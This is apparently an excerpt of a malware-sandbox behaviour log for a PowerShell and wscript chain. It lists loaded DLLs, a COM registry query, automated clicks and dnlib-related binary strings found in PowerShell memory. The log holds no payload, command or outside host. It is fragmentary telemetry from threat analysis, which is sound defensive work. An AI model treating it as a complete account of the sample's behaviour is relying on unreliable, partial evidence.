Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\wscript.exeAutomated click: OK
Source: C:\Windows\System32\wscript.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb[ source: powershell.exe, 00000003.00000002.2203709649.0000022A9B821000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000003.00000002.2211606771.00007FFD9BC50000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: m.Core.pdbpdb` source: powershell.exe, 00000003.00000002.2202319158.0000022A9B4E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000003.00000002.2203709649.0000022A9B82B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2203709649.0000022A9B821000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000003.00000002.2211606771.00007FFD9BC50000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.pdb source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
